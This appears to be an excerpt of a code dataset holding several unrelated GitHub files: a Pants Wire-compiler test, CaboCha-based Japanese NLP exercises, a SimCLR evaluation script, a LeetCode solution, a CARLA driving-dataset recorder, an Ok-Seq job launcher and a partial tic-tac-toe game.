'--service_writer=org.pantsbuild.DummyServiceWriter',\n '--service_writer_opt', 'opt1',\n '--service_writer_opt', 'opt2',\n '--proto_path={}/wire-src'.format(self.build_root),\n 'bar.proto'],\n task.format_args_for_target(wire_targetv1))\n\n def test_compiler_wire2_with_writer_errors(self):\n self._create_fake_wire_tool(version='2.0.0')\n SourceRoot.register('wire-src')\n wire_targetv1 = self.make_target('wire-src:wire-targetv1', JavaWireLibrary,\n sources=['bar.proto'],\n service_writer='org.pantsbuild.DummyServiceWriter',\n service_writer_options=['opt1', 'opt2'])\n task = self.create_task(self.context(target_roots=[wire_targetv1]))\n with self.assertRaises(TaskError):\n task.format_args_for_target(wire_targetv1)\n\n def test_compiler_wire1_with_factory_errors(self):\n self._create_fake_wire_tool()\n SourceRoot.register('wire-src')\n wire_targetv2 = self.make_target('wire-src:wire-targetv2', JavaWireLibrary,\n sources=['baz.proto'],\n service_factory='org.pantsbuild.DummyServiceFactory',\n service_factory_options=['v2opt1', 
'v2opt2'])\n task = self.create_task(self.context(target_roots=[wire_targetv2]))\n with self.assertRaises(TaskError):\n task.format_args_for_target(wire_targetv2)\n\n def test_compiler_args_wirev2(self):\n self._create_fake_wire_tool(version='2.0.0')\n SourceRoot.register('wire-src')\n wire_targetv2 = self.make_target('wire-src:wire-targetv2', JavaWireLibrary,\n sources=['baz.proto'],\n service_factory='org.pantsbuild.DummyServiceFactory',\n service_factory_options=['v2opt1', 'v2opt2'])\n task = self.create_task(self.context(target_roots=[wire_targetv2]))\n self.assertEquals([\n '--java_out={}/{}/wire-src.wire-targetv2'.format(self.build_root, self.EXPECTED_TASK_PATH),\n '--service_factory=org.pantsbuild.DummyServiceFactory',\n '--service_factory_opt', 'v2opt1',\n '--service_factory_opt', 'v2opt2',\n '--proto_path={}/wire-src'.format(self.build_root),\n 'baz.proto'],\n task.format_args_for_target(wire_targetv2))\n\n def test_compiler_args_all(self):\n self._create_fake_wire_tool(version='2.0.0')\n SourceRoot.register('wire-src')\n kitchen_sink = self.make_target('wire-src:kitchen-sink', JavaWireLibrary,\n sources=['foo.proto', 'bar.proto', 'baz.proto'],\n registry_class='org.pantsbuild.Registry',\n service_factory='org.pantsbuild.DummyServiceFactory',\n no_options=True,\n roots=['root1', 'root2', 'root3'],\n enum_options=['enum1', 'enum2', 'enum3'],)\n task = self.create_task(self.context(target_roots=[kitchen_sink]))\n self.assertEquals([\n '--java_out={}/{}/wire-src.kitchen-sink'.format(self.build_root, self.EXPECTED_TASK_PATH),\n '--no_options',\n '--service_factory=org.pantsbuild.DummyServiceFactory',\n '--registry_class=org.pantsbuild.Registry',\n '--roots=root1,root2,root3',\n '--enum_options=enum1,enum2,enum3',\n '--proto_path={}/wire-src'.format(self.build_root),\n 'foo.proto',\n 'bar.proto',\n 'baz.proto'],\n task.format_args_for_target(kitchen_sink))\n\n def test_compiler_args_proto_paths(self):\n self._create_fake_wire_tool(version='2.0.0')\n SourceRoot.register('wire-src')\n SourceRoot.register('wire-other-src')\n parent_target = self.make_target('wire-other-src:parent-target', JavaWireLibrary,\n sources=['bar.proto'])\n simple_wire_target = self.make_target('wire-src:simple-wire-target', JavaWireLibrary,\n sources=['foo.proto'], dependencies=[parent_target])\n context = self.context(target_roots=[parent_target, simple_wire_target])\n task = self.create_task(context)\n self.assertEquals([\n '--java_out={}/{}/wire-src.simple-wire-target'.format(self.build_root,\n self.EXPECTED_TASK_PATH),\n '--proto_path={}/wire-src'.format(self.build_root),\n '--proto_path={}/wire-other-src'.format(self.build_root),\n 'foo.proto'],\n task.format_args_for_target(simple_wire_target))\n\n def test_wire_compiler_version_robust(self):\n # Here the wire compiler is both indirected, and not 1st in the classpath order.\n guava = self.make_target('3rdparty:guava',\n JarLibrary,\n jars=[JarDependency('com.google.guava', 'guava', '18.0')])\n wire = self.make_target('3rdparty:wire',\n JarLibrary,\n jars=[\n JarDependency('com.squareup.wire', 'wire-compiler', '3.0.0')\n .exclude('com.google.guava', 'guava')\n ])\n alias = self.make_target('a/random/long/address:spec', Target, dependencies=[guava, wire])\n self.set_options(wire_compiler='a/random/long/address:spec')\n task = self.create_task(self.context(target_roots=[alias]))\n self.assertEqual(Revision(3, 0, 0), task.wire_compiler_version)\n\n def test_wire_compiler_version_none(self):\n guava = self.make_target('3rdparty:guava',\n JarLibrary,\n 
jars=[JarDependency('com.google.guava', 'guava', '18.0')])\n self.set_options(wire_compiler='3rdparty:guava')\n task = self.create_task(self.context(target_roots=[guava]))\n with self.assertRaises(task.WireCompilerVersionError):\n task.wire_compiler_version\n\n def test_wire_compiler_version_conflict(self):\n george = self.make_target('3rdparty:george',\n JarLibrary,\n jars=[JarDependency('com.squareup.wire', 'wire-compiler', '3.0.0'),\n JarDependency('com.squareup.wire', 'wire-compiler', '1.6.0')])\n self.set_options(wire_compiler='3rdparty:george')\n task = self.create_task(self.context(target_roots=[george]))\n with self.assertRaises(task.WireCompilerVersionError):\n task.wire_compiler_version\n","repo_name":"praveen-srinivasan/pants","sub_path":"tests/python/pants_test/backend/codegen/tasks/test_wire_gen.py","file_name":"test_wire_gen.py","file_ext":"py","file_size_in_byte":14219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"9729908365","text":"# coding: utf-8\nimport CaboCha\nimport pydotplus\nimport subprocess\n\"\"\"\nnlp_40.py\n\n40. 係り受け解析結果の読み込み(形態素)\n\n形態素を表すクラスMorphを実装せよ.このクラスは表層形(surface),基本形(base),品詞(pos),\n品詞細分類1(pos1)をメンバ変数に持つこととする.\nさらに,CaboChaの解析結果(neko.txt.cabocha)を読み込み,各文をMorphオブジェクトのリストとして表現し,\n3文目の形態素列を表示せよ.\n\"\"\"\n\ndef make_analyzed_file(input_file_name: str, output_file_name: str) -> None:\n \"\"\"cabocha fileを作る\"\"\"\n cbc = CaboCha.Parser()\n with open(input_file_name, encoding = 'utf-8') as input_file, \\\n open(output_file_name, mode = 'w', encoding = 'utf-8') as output_file:\n\n for line in input_file:\n tree = cbc.parse(line.lstrip()) # 文字列の先頭の空白文字を除去\n output_file.write(tree.toString(CaboCha.FORMAT_LATTICE))\n\n\nclass Morph:\n \"\"\" 1つの形態素を表すクラス\"\"\"\n\n def __init__(self, surface, base, pos, pos1):\n\n self.surface = surface # 表層系\n self.base = base # 基本形\n self.pos = pos # 品詞\n self.pos1 = pos1 # 品詞細分類\n\n def is_end_of_sentence(self) -> bool:\n return self.pos1 == '句点'\n\n def __str__(self) -> str:\n return 'surface: {}, base: {}, pos: {}, pos1: {}'\\\n .format(self.surface, self.base, self.pos, self.pos1)\n \ndef make_morph_list(analyzed_file_name: str) -> list:\n \"\"\"係り受け解析したファイルを読み,Morphオブジェクトとして返す\"\"\"\n \n sentences = []\n sentence = []\n with open(analyzed_file_name, encoding='utf-8') as input_file:\n \n for line in input_file:\n line_list = line.split()\n if (line_list[0] == '*') | (line_list[0] == 'EOS'):\n pass\n \n else:\n line_list = line_list[0].split(',') + line_list[1].split(',')\n # (e.f.) 
['見違える', '動詞', '自立', '*', '*', '一段',\n # '基本形', '見違える', 'ミチガエル', 'ミチガエル']\n\n _morph = Morph(surface = line_list[0], base = line_list[7],\n pos = line_list[1], pos1 = line_list[2])\n\n sentence.append(_morph)\n\n if _morph.is_end_of_sentence():\n sentences.append(sentence)\n sentence = []\n \n return sentences\n \n \n \nif __name__ == '__main__':\n\n make_analyzed_file('neko.txt', 'neko.txt.cabocha')\n \n morphed_sentences = make_morph_list('neko.txt.cabocha') # 7486\n # print(len(morphed_sentences))\n\n for morph in morphed_sentences[2]:\n print(str(morph))\n\n \n \n","repo_name":"jusui/Data_Science","sub_path":"nlp100/trial_2/nlp_40.py","file_name":"nlp_40.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9729919125","text":"# coding: utf-8\nimport CaboCha\nimport pydotplus\nimport subprocess\nfrom nlp_40 import Morph\nfrom nlp_42 import make_chunk_list, is_valid_chunk\nfrom nlp_43 import Chunk\n\"\"\"\n44. 係り受け木の可視化\n\n与えられた文の係り受け木を有向グラフとして可視化せよ.\n可視化には,係り受け木をDOT言語に変換し,Graphvizを用いるとよい.また,Pythonから有向グラフを直接的に可視化するには,pydotを使うとよい.\n\"\"\"\n\ndef sentence_to_dot(idx: int, sentence: list) -> str:\n \"\"\"dot言語を作る\n https://qiita.com/rubytomato@github/items/51779135bc4b77c8c20d\n \"\"\"\n head = \"digraph sentence{} \".format(idx)\n body_head = \"{ graph [rankdir = LR]; \"\n # https://docs.python.jp/3/tutorial/controlflow.html#unpacking-argument-lists\n # リストをアンパック\n body_list = ['\"{}\"->\"{}\"; '.format(*chunk_pair.split()) for chunk_pair in sentence]\n \n return head + body_head + ''.join(body_list) + '}'\n\ndef sentences_to_dot(sentences: list ) -> list:\n \"\"\"sentenceをdot言語に変換\"\"\"\n _dots = []\n for idx, sentence in enumerate(sentences):\n # print(\"sentence :\", sentence)\n _dots.append(sentence_to_dot(idx, sentence))\n return _dots\n\ndef save_graph(dot: str, file_name: str) -> None:\n g = pydotplus.graph_from_dot_data(dot)\n g.write_jpeg(file_name, prog = 'dot')\n \n\nif __name__ == '__main__':\n\n chunked_sentences = make_chunk_list('neko.txt.cabocha')\n paired_sentences = [ [chunk.pair(sentence) for chunk in sentence \\\n if is_valid_chunk(chunk, sentence)] \\\n for sentence in chunked_sentences \\\n if len(sentence) > 1 ]\n \n dots = sentences_to_dot(paired_sentences)\n\n for idx in range(101, 104):\n save_graph(dots[idx], 'graph{}.jpg'.format(idx))\n \n","repo_name":"jusui/Data_Science","sub_path":"nlp100/trial_2/nlp_44.py","file_name":"nlp_44.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70035717552","text":"import torchvision\nimport torch\nfrom copy import deepcopy\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import preprocessing\nfrom torchvision.datasets import ImageFolder\nfrom torchvision import transforms, datasets\nfrom models.aug_simclr import SimCLRModel\ndata_transform = transforms.Compose([\n transforms.RandomResizedCrop(size=224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\ntrain_dataset = datasets.ImageFolder(root='../imagenet20',transform=data_transform)\ntest_dataset = datasets.ImageFolder(root='../imagenet20_val',transform=data_transform)\ntrain_loader = torch.utils.data.DataLoader(train_dataset,batch_size=4, shuffle=True,num_workers=4)\ntest_loader = torch.utils.data.DataLoader(test_dataset,batch_size=4, shuffle=True,num_workers=4)\n@torch.no_grad()\ndef 
evaluation(model):\n \n network = deepcopy(model.resnet)\n # network.projection = nn.Identity()\n network.eval()\n network.to('cuda:1')\n \n X_train_feature=[]\n y_train=[]\n X_test_feature=[]\n y_test=[]\n \n for data in train_loader:\n x, y = data\n x = x.to('cuda:1')\n features = network(x)\n X_train_feature.extend(features.cpu().detach().numpy())\n y_train.extend(y.cpu().detach().numpy())\n for data in test_loader:\n x, y = data\n x = x.to('cuda:1')\n features = network(x)\n X_test_feature.extend(features.cpu().detach().numpy())\n y_test.extend(y.cpu().detach().numpy())\n scaler = preprocessing.StandardScaler()\n scaler.fit(X_train_feature)\n X_train_feature = scaler.transform(X_train_feature)\n X_test_feature = scaler.transform(X_test_feature)\n clf = LogisticRegression(random_state=0, max_iter=10000, solver='lbfgs', C=1.0)# Multinomial Loss\n clf.fit(X_train_feature, y_train)\n print(\"Logistic Regression feature eval\")\n print(\"Train score:\", clf.score(X_train_feature, y_train))\n print(\"Test score:\", clf.score(X_test_feature, y_test))\nmodel = SimCLRModel.load_from_checkpoint('./simclr/xi4tsgxl/checkpoints/epoch=16-step=3451.ckpt')\nevaluation(model)","repo_name":"has97/Self-Supervised-Diffusion","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70912655470","text":"\"\"\"\nYou are given an array of strings arr. A string s is formed by the concatenation of a subsequence of arr that has unique characters.\n\nReturn the maximum possible length of s.\n\nA subsequence is an array that can be derived from another array by deleting some or no elements without changing the order of the remaining elements.\n\n\n\nExample 1:\n\nInput: arr = [\"un\",\"iq\",\"ue\"]\nOutput: 4\nExplanation: All the valid concatenations are:\n- \"\"\n- \"un\"\n- \"iq\"\n- \"ue\"\n- \"uniq\" (\"un\" + \"iq\")\n- \"ique\" (\"iq\" + \"ue\")\nMaximum length is 4.\n\nExample 2:\n\nInput: arr = [\"cha\",\"r\",\"act\",\"ers\"]\nOutput: 6\nExplanation: Possible longest valid concatenations are \"chaers\" (\"cha\" + \"ers\") and \"acters\" (\"act\" + \"ers\").\n\nExample 3:\n\nInput: arr = [\"abcdefghijklmnopqrstuvwxyz\"]\nOutput: 26\nExplanation: The only string in arr has all 26 characters.\n\n\n\nConstraints:\n\n 1 <= arr.length <= 16\n 1 <= arr[i].length <= 26\n arr[i] contains only lowercase English letters.\n\n\n\"\"\"\n\nfrom collections import Counter\nfrom typing import *\n\n\nclass Solution:\n def maxLength(self, arr: List[str]) -> int:\n def dfs_val(crt_set: set, arr: List[set]):\n if len(arr) == 0:\n return 0\n else:\n idx = 0\n while crt_set.intersection(arr[idx]).__len__() != 0:\n idx += 1\n if idx >= arr.__len__():\n return 0\n return max(dfs_val(crt_set, arr[idx + 1:]), arr[idx].__len__() + dfs_val(crt_set.union(arr[idx]), arr[idx + 1:]))\n\n arr = list(filter(lambda x: max(Counter(x).values()) <= 1, arr))\n arr = [set(i) for i in arr]\n return dfs_val(set(), arr)\n\n\nA = Solution()\narr = [\"un\", \"iq\", \"ue\"]\nA.maxLength(arr)\n","repo_name":"yqxd/python_medium","sub_path":"1239MaximumLengthofaConcatenatedStringwithUniqueCharacters.py","file_name":"1239MaximumLengthofaConcatenatedStringwithUniqueCharacters.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42643567616","text":"import carla\nimport random\nimport time\nfrom 
agents.navigation.stand_still_agent import StandStillAgent\nfrom scenario_runner.srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n\nimport numpy as np\nimport cv2\nfrom queue import Queue\n\nfrom junction_annotator import JunctionAnnotator\nfrom state_extractor import StateExtractor\n\nfrom yolov7_carla_object_detection.carla_detect import CarlaObjectDetector\nfrom typing import List, Tuple\nfrom collections import deque\nimport copy\nimport csv\nimport os\nimport subprocess\nfrom scenario_runner.srunner.tools.route_manipulation import interpolate_trajectory, interpolate_wp_trajectory\n\n\nclass DatasetGenPerceptionModelAgent:\n\n def __init__(self, start_timestamp, scenario_name, ego_junction_distance, actor_junction_distance) -> None:\n # Connect to the server\n self.client = carla.Client('localhost', 2000)\n self.client.set_timeout(1000.0) # seconds\n # Get the world\n self.world = self.client.get_world()\n\n # remove stationary env vehicles:\n env_objs = self.world.get_environment_objects(carla.CityObjectLabel.Vehicles)\n objects_to_toggle = {car.id for car in env_objs}\n self.world.enable_environment_objects(objects_to_toggle, False)\n \n self.map = self.world.get_map()\n self.dummy_tick = False\n\n self.current_image_index = 0\n self.current_rgb_image_index = 0\n self.data_collection_started = False\n self.frames_skipped = []\n self.start_timestamp = start_timestamp\n self.scenario_name = scenario_name\n self.ego_junction_distance = ego_junction_distance\n self.actor_junction_distance = actor_junction_distance\n self.no_skipped_frames = 0\n dir_path = f\"./recording/{self.start_timestamp}\"\n if not os.path.exists(dir_path):\n os.makedirs(dir_path, exist_ok=True) # Create directory if it doesn't exist\n\n\n self.ego_vehicle, self.other_vehicles = self.get_ego_and_other_vehicles()\n self.active_scenario_vehicle = self.other_vehicles[0]\n self.agent = StandStillAgent(self.ego_vehicle)\n\n # spawn the sensor and attach to vehicle.\n blueprint_library = self.world.get_blueprint_library()\n cam_bp = blueprint_library.find('sensor.camera.instance_segmentation')\n cam_bp.set_attribute('image_size_x', '608')\n cam_bp.set_attribute('image_size_y', '608')\n sensor_transform = carla.Transform(carla.Location(x=2.5, z=2))\n self.sensor = self.world.spawn_actor(cam_bp, sensor_transform, attach_to=self.ego_vehicle)\n self.sensor.listen(lambda image: self.process_img(image))\n\n\n blueprint_library = self.world.get_blueprint_library()\n cam_bp = blueprint_library.find('sensor.camera.rgb')\n cam_bp.set_attribute('image_size_x', '608')\n cam_bp.set_attribute('image_size_y', '608')\n # cam_bp.set_attribute('motion_blur_intensity', '1')\n # cam_bp.set_attribute('motion_blur_max_distortion', '1')\n sensor_transform = carla.Transform(carla.Location(x=2.5, z=2))\n self.rgb_sensor = self.world.spawn_actor(cam_bp, sensor_transform, attach_to=self.ego_vehicle)\n self.rgb_sensor.listen(lambda image: self.process_img(image, rgb=True))\n\n\n # Get the attributes from the camera\n image_w = cam_bp.get_attribute(\"image_size_x\").as_int()\n image_h = cam_bp.get_attribute(\"image_size_y\").as_int()\n fov = cam_bp.get_attribute(\"fov\").as_float()\n\n # Calculate the camera projection matrix to project from 3D -> 2D\n self.K = self.build_projection_matrix(image_w, image_h, fov)\n self.current_camera_image = None\n\n CarlaDataProvider.set_client(self.client)\n CarlaDataProvider.set_world(self.world)\n\n self.ego_traffic_light, self.op_traffic_light = self.get_traffic_lights()\n affected_waypoints 
= self.op_traffic_light.get_affected_lane_waypoints()\n num_wp = 0\n ego_tl_point = self.ego_traffic_light.get_affected_lane_waypoints()[0]\n self.ego_stop_pt = self.get_junction_stop_point(ego_tl_point)\n self.actor_stop_pt = self.get_junction_stop_point(affected_waypoints[0])\n \n \n # set the spectator to ego vehicle\n spectator = self.world.get_spectator()\n transform_vehicle = self.ego_vehicle.get_transform()\n spectator.set_transform(carla.Transform(transform_vehicle.location + carla.Location(z=50), carla.Rotation(pitch=-90)))\n time.sleep(1)\n\n\n \n self.junction_annotator = JunctionAnnotator(self.world, ego_vehicle=self.ego_vehicle, camera_bp=cam_bp, camera=self.sensor)\n self.state_extractor = StateExtractor()\n\n self.count = 0\n\n # Set the world in synchronous mode\n settings = self.world.get_settings()\n settings.synchronous_mode = True\n settings.fixed_delta_seconds = 0.1 # 0.05 seconds (20 FPS)\n self.world.apply_settings(settings)\n \n def get_junction_stop_point(self, current_tl_stop_point):\n intersection = self.get_next_intersection(current_tl_stop_point)\n ent_exit_pts = intersection.get_waypoints(carla.LaneType.Driving)\n junction_pts = []\n for sublish in ent_exit_pts:\n junction_pts.extend(sublish)\n loc_target = current_tl_stop_point.transform.location\n stop_point = None\n min_distance = 1e9\n for point in junction_pts:\n loc = point.transform.location\n dist = loc.distance(loc_target)\n if dist < min_distance:\n stop_point = point\n min_distance = dist\n return stop_point\n\n def get_next_intersection(self, waypoint):\n list_of_waypoints = []\n while waypoint and not waypoint.is_intersection:\n list_of_waypoints.append(waypoint)\n waypoint = waypoint.next(2.0)[0]\n\n # If the list is empty, the actor is in an intersection\n if not list_of_waypoints:\n return waypoint.get_junction()\n else:\n return waypoint.get_junction()\n \n def process_img(self, image: carla.Image, rgb=False):\n # Convert the image from CARLA format to an OpenCV image (RGB)\n frame_id = image.frame\n image_file_name = f\"{self.scenario_name}_{frame_id}\"\n if not self.data_collection_started or not self.keep_frame(frame_id):\n # print(f\"skipping img frame {frame_id}\")\n return\n \n if rgb:\n # print(f\"RGB image frame: {frame_id}\")\n image.save_to_disk(f\"./recording/{self.start_timestamp}/rgb/{image_file_name}.png\")\n self.current_rgb_image_index = frame_id\n else:\n # print(f\"image frame: {frame_id}\")\n image.save_to_disk(f\"./recording/{self.start_timestamp}/instance/{image_file_name}.png\")\n self.current_image_index = frame_id\n\n def get_traffic_lights(self) -> Tuple[carla.TrafficLight, carla.TrafficLight]:\n ego_light = self.ego_vehicle.get_traffic_light()\n op_traffic_light = self.op_traffic_light = CarlaDataProvider.annotate_trafficlight_in_group(ego_light)[\"opposite\"][0]\n return ego_light, op_traffic_light\n\n \n def get_ego_and_other_vehicles(self) -> Tuple[carla.Vehicle, List[carla.Actor]]:\n ego_vehicle = None\n while ego_vehicle is None:\n print(\"Waiting for the ego vehicle...\")\n time.sleep(1)\n non_ego = []\n possible_vehicles = self.world.get_actors().filter('vehicle.*')\n for vehicle in possible_vehicles:\n if vehicle.attributes['role_name'] == 'hero':\n print(\"Ego vehicle found\")\n ego_vehicle = vehicle\n else:\n non_ego.append(vehicle)\n return ego_vehicle, non_ego\n \n def set_active_vehicle(self):\n for i in range(10000):\n for vehicle in self.other_vehicles:\n # print(vehicle.get_transform().location)\n if vehicle.get_transform().location.z > -3:\n if 
vehicle.get_transform().location.x == 0 and vehicle.get_transform().location.y == 0:\n return False\n self.active_scenario_vehicle = vehicle\n print(f\"found after {i} ticks\")\n return True\n self.dummy_tick = True\n self.world.tick()\n return False\n\n \n def get_state(self):\n other_vehicle_loc = self.active_scenario_vehicle.get_location()\n other_vehicle_wp = self.map.get_waypoint(other_vehicle_loc)\n actor_distance = other_vehicle_loc.distance(self.actor_stop_pt.transform.location)\n if other_vehicle_wp.is_junction:\n actor_distance = -actor_distance\n \n ego_loc = self.ego_vehicle.get_location()\n ego_wp = self.map.get_waypoint(ego_loc)\n # ego_distance = ego_loc.distance(self.ego_stop_pt.transform.location)\n ego_distance = len(interpolate_wp_trajectory(self.world, [ego_wp, self.ego_stop_pt], 1))\n if ego_wp.is_junction:\n ego_distance = -len(interpolate_wp_trajectory(self.world, [self.ego_stop_pt, ego_wp], 1))\n \n \n return ego_distance, actor_distance\n\n \n def save_to_csv(self, data_list, filename=\"states.csv\"):\n filepath = f\"./recording/{self.start_timestamp}/{filename}\"\n file_exists = os.path.isfile(filepath)\n headers = ['image_file_name', 'ego_distance', 'ego_velocity', 'actor_distance', 'ego_junction_distance', 'actor_junction_distance']\n with open(filepath, 'a') as csvfile:\n writer = csv.DictWriter(csvfile, delimiter=',', lineterminator='\\n', fieldnames=headers)\n if not file_exists:\n writer.writeheader()\n for data in data_list:\n writer.writerow(data)\n\n def keep_frame(self, frame_id):\n if self.no_skipped_frames == 0:\n return True\n if (frame_id - self.starting_frame) % self.no_skipped_frames == 0:\n return True\n return False\n\n def start_data_collection(self):\n data = []\n # Setting the light to green is the trigger for scenario. 
See DatasetGenSurrogateModel scenario\n self.ego_traffic_light.freeze(False)\n self.ego_traffic_light.set_state(carla.TrafficLightState.Green)\n print(\"Triggered the light\")\n count = 0\n previous_ego_distance, previous_actor_distance = 0, 0\n\n self.starting_frame = self.world.get_snapshot().frame\n self.data_collection_started = True\n while True:\n if self.active_scenario_vehicle.get_transform().location.z < -4:\n if not self.set_active_vehicle():\n print(\"no active non scenario vehicle for 100 ticks\")\n break\n \n frame_id = self.world.get_snapshot().frame\n if not self.keep_frame(frame_id):\n # print(f\"skipping frame {frame_id}\")\n self.world.tick()\n continue\n \n if self.agent.done():\n print(\"The target has been reached, stopping the simulation\")\n break\n \n while self.current_image_index < frame_id or self.current_rgb_image_index < frame_id:\n time.sleep(0.1)\n # print(\"waiting for image sync\")\n self.world.tick()\n self.sensor.destroy()\n \n def read_csv_frames(self, filename=\"states.csv\"):\n filepath = f\"./recording/{self.start_timestamp}/{filename}\"\n if not os.path.exists(filepath):\n return []\n \n frames = []\n with open(filepath, 'r') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n frames.append(row['image_file_name'][:-2])\n return frames\n\n def get_saved_frames(self, directory_name):\n dir_path = f\"./recording/{self.start_timestamp}/{directory_name}\"\n if not os.path.exists(dir_path):\n return []\n \n frames = [filename.split('.')[0] for filename in os.listdir(dir_path) if filename.endswith('.png')]\n return frames\n \n def delete_csv_entry(self, frame_id, filename=\"states.csv\"):\n filepath = f\"./recording/{self.start_timestamp}/{filename}\"\n if not os.path.exists(filepath):\n return\n\n with open(filepath, 'r') as csvfile:\n lines = csvfile.readlines()\n with open(filepath, 'w') as csvfile:\n for line in lines:\n if line.split(',')[0] != str(frame_id):\n csvfile.write(line)\n \n \n def verify_and_delete_mismatched_frames(self):\n csv_frames = self.read_csv_frames()\n saved_instance_frames = self.get_saved_frames(\"instance\")\n saved_rgb_frames = self.get_saved_frames(\"rgb\")\n\n # Frames present in CSV but not in the saved images\n for frame in csv_frames:\n if frame not in saved_instance_frames:\n # Deleting CSV entry\n self.delete_csv_entry(frame)\n if frame not in saved_rgb_frames:\n # Deleting CSV entry\n self.delete_csv_entry(frame)\n\n # Frames present in saved images but not in the CSV\n for frame in saved_instance_frames:\n if frame not in csv_frames:\n os.remove(f\"./recording/{self.start_timestamp}/instance/{frame}.png\")\n \n for frame in saved_rgb_frames:\n if frame not in csv_frames:\n os.remove(f\"./recording/{self.start_timestamp}/rgb/{frame}.png\")\n\n\n\n \n def cleanup(self):\n CarlaDataProvider.cleanup()\n self.sensor.destroy()\n\nif __name__ == \"__main__\":\n import subprocess\n import os\n import signal\n junction_params = {\n 1: [30, 31],\n 2: [30, 32],\n 3: [31, 37],\n 4: [29, 36]\n }\n start_record_name = time.time()\n start_record_name = \"new_dataset\"\n try:\n for i in range(1, 5):\n # carla_simulator = subprocess.Popen(\"/opt/carla-simulator/CarlaUE4.sh -prefernvidia\", shell=True, preexec_fn=os.setsid)\n # print(\"waiting for simulator startup\")\n # time.sleep(20)\n scenario_name = f\"DatasetGenPerceptionModelRS_{i}\"\n junction_param = junction_params.get(i)\n print(f\"starting scenario: {scenario_name}\")\n # scenario = subprocess.Popen([\"python3\", \"./scenario_runner/scenario_runner.py\", 
\"--scenario\", scenario_name, \"--reloadWorld\"], preexec_fn=os.setsid)\n print(\"waiting for scenario to start\")\n # time.sleep(30)\n print(\"scenario started\")\n print(\"starting data collection\")\n datasetgenerator = DatasetGenPerceptionModelAgent(start_record_name, scenario_name, junction_param[0], junction_param[1])\n datasetgenerator.start_data_collection()\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(carla_simulator.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(carla_simulator.pid), signal.SIGTERM)\n # time.sleep(2)\n # os.killpg(os.getpgid(carla_simulator.pid), signal.SIGTERM)\n # print(\"killing the simulator\")\n # time.sleep(10)\n datasetgenerator.verify_and_delete_mismatched_frames()\n except KeyboardInterrupt:\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n datasetgenerator.cleanup()\n \n","repo_name":"arehman1806/carla-experiments-RDDPS","sub_path":"dataset_gen_perception_model_agent_rs.py","file_name":"dataset_gen_perception_model_agent_rs.py","file_ext":"py","file_size_in_byte":15814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6498976337","text":"#\n\nimport sys\nimport os\nimport glob\n\nif(len(sys.argv) >= 2):\n base_dir=sys.argv[1]\nelse:\n print(\"Error no input parameter for start directory.\")\n exit(1)\n\n#get all dir names in base_dir\nfor root, dirs, files in os.walk(base_dir, topdown=False):\n for name in dirs:\n cur_dir = os.path.join(root, name)\n\n #get the fastq.gz R1 and R2 files\n r1_file = glob.glob(cur_dir + '/*R1_001.fastq.gz')[0]\n r1_file = os.path.split(r1_file)[1]\n r2_file = glob.glob(cur_dir + '/*R2_001.fastq.gz')[0]\n r2_file = os.path.split(r2_file)[1]\n\n print(f\"sbatch run_process_okseq.sh '{cur_dir}' '{base_dir}' '{r1_file}' '{r2_file}' 'aligned.sam' '{name}_log.txt' '{name}_out.txt'\")\n print(\"\")\n os.system(f\"sbatch run_process_okseq.sh '{cur_dir}' '{base_dir}' '{r1_file}' '{r2_file}' 'aligned.sam' '{name}_log.txt' '{name}_out.txt'\")\n\n","repo_name":"FenyoLab/Ok-Seq_Processing","sub_path":"run_on_server.py","file_name":"run_on_server.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18133958018","text":"def checkWinning(mat,win,player):\n for i in range(3):\n if mat[i][0]==mat[i][1]==mat[i][2]!=\"_\": # vertical\n win[player]=True\n return\n if mat[0][i]==mat[1][i]==mat[2][i]!=\"_\": # horizontal\n win[player]=True\n return\n if mat[0][0]==mat[1][1]==mat[2][2]!=\"_\": # diagonal_1\n win[player]=True\n return\n if mat[0][2]==mat[1][1]==mat[2][0]!=\"_\": # diagonal_2\n win[player]=True\n return\n\nif __name__==\"__main__\":\n players=[input(\"Enter Name of Player 1 (X): \"),input(\"Enter Name of Player 2 (0): \")]\n marked=0\n turn=0\n print(\"\\nGRID:\\n1 2 3\\n4 5 6\\n7 8 9\")\n positions={\n '1':[0,0], '2':[0,1], '3':[0,2],\n '4':[1,0], '5':[1,1], '6':[1,2],\n '7':[2,0], '8':[2,1], '9':[2,2],\n }\n matrix=[[\"_\"]*3 for _ in range(3)]\n win=[False,False]\n while marked<9 and not (win[0] or win[1]):\n print(\"\\n{}'s Turn\".format(players[turn]))\n for mat in matrix:\n print(*mat)\n pos=input(\"Enter Position: \")\n try:\n r,c=positions[pos]\n if matrix[r][c]=='_':\n matrix[r][c]='X' if turn==0 
